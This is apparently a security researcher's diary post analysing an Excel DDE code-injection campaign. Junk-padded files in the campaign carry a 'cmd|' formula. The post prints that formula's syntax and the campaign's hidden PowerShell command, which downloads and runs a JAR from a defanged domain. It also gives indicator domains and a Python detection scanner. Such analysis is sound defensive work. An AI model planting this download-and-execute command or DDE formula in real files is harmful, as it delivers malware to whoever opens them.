More Excel DDE Code Injection
The “DDE code injection” technique is not brand new. DDE stands for “Dynamic Data Exchange”[1]. It has already been discussed by many security researchers[2]. Just a quick reminder for those who missed it. In Excel, it is possible to trigger the execution of an external command by using the following syntax:
=cmd|'arguments'!cell
While some malicious Excel files were spotted recently, yesterday I found a bunch of files all related to the same campaign. The interesting fact is that all those files have a VT score of 0! Indeed, they contain a lot of junk strings and, in the middle of them, a DDE injection:
$ head -10 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98.vir
lljecTcCsRfkqsBfL2ud7yg1Eeeb KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D tWgf38B1VjbL2Rp4LXyCuaDbcAk9wuSuA3PLjDmXSmIaTb6ZxEcswmHSTRXo6Fl54NRVLl7onJMgJOnxGWXayUq GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP RsrzZKKq1GjBhFzkzXQhs9i3A5Jvb46HdNyEqpMVJtlljecTcCsRfkqsBfL2ud7yg1EeebNrKZi Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL
By default, Excel will consider any file not recognized as a valid sheet as CSV and will open it as is.
Here is the command executed:
powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"hxxp://topehagepa[.]online\" ,\" %temp%\\WJJWBHVFUG.jar\") }" & %temp%\\WJJWBHVFUG.jar’
I'm using a YARA rule to catch them on VirusTotal and I already found some samples and related domain names.
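As an added example (not the diary's YARA rule or any code from the campaign), here is a small Python scanner that flags the DDE formula pattern described above when it is buried inside an otherwise junk-filled file that Excel would open as CSV. The sample content and the inert `echo` payload are constructed for the test.

```python
import re

# A DDE formula as Excel evaluates it: a formula-start character (=, +, -, @),
# a DDE server name, a pipe, a quoted argument string, "!" and a topic/cell
# reference. Curly quotes are accepted because copy/paste often mangles them.
DDE_RE = re.compile(
    r"""[=+\-@]\s*
        (?P<app>[A-Za-z][\w.]*)                 # server, e.g. cmd or MSEXCEL
        \s*\|\s*
        (?P<args>['\u2018\u2019][^'\u2018\u2019\r\n]*['\u2018\u2019])
        \s*!\s*
        (?P<topic>[A-Za-z]\w*)                  # topic / cell, e.g. A0
    """,
    re.VERBOSE,
)


def find_dde(text):
    """Return one dict per DDE formula found in `text` (empty list if none)."""
    hits = []
    for m in DDE_RE.finditer(text):
        hits.append({
            "app": m.group("app"),
            "args": m.group("args")[1:-1],          # strip the surrounding quotes
            "topic": m.group("topic"),
            "line": text.count("\n", 0, m.start()) + 1,
        })
    return hits


def scan_file(path):
    """Scan an on-disk file; latin-1 decoding keeps every byte addressable."""
    with open(path, "rb") as fh:
        return find_dde(fh.read().decode("latin-1"))


# Constructed sample mirroring the campaign's layout: junk lines around one
# DDE formula. The payload is a harmless echo, not the campaign's command.
SAMPLE = "\n".join([
    "lljecTcCsRfkqsBfL2ud7yg1Eeeb KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D",
    "GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP RsrzZKKq1GjBhFzkzXQhs",
    "=cmd|'/c echo dde-test'!A0",
    "Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL",
])

if __name__ == "__main__":
    for hit in find_dde(SAMPLE):
        print(f"line {hit['line']}: {hit['app']} -> {hit['args']} ({hit['topic']})")
```

Run it over a suspicious download with `scan_file(path)`; any hit is worth a closer look, since a legitimate CSV has no reason to carry a `cmd|` formula.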
SHA256 of samples:
Domain names:
cafogekago[.]online
yepeyowora[.]online
jekarebege[.]online
gelovosaja[.]club
topehagepa[.]online
nomawesefa[.]club
saboverome[.]online
vazawoweso[.]online
All the domains resolve to the same IP address: 54.36.212.133 (located at OVH in France), but the server is down at the moment. The downloaded file being a Java archive, chances are that it's a classic Trojan. Has anybody successfully got access to these files? I'd be happy to have a look at them.
[1] https://docs.microsoft.com/en-us/windows/desktop/dataxchg/dynamic-data-exchange
[2] https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant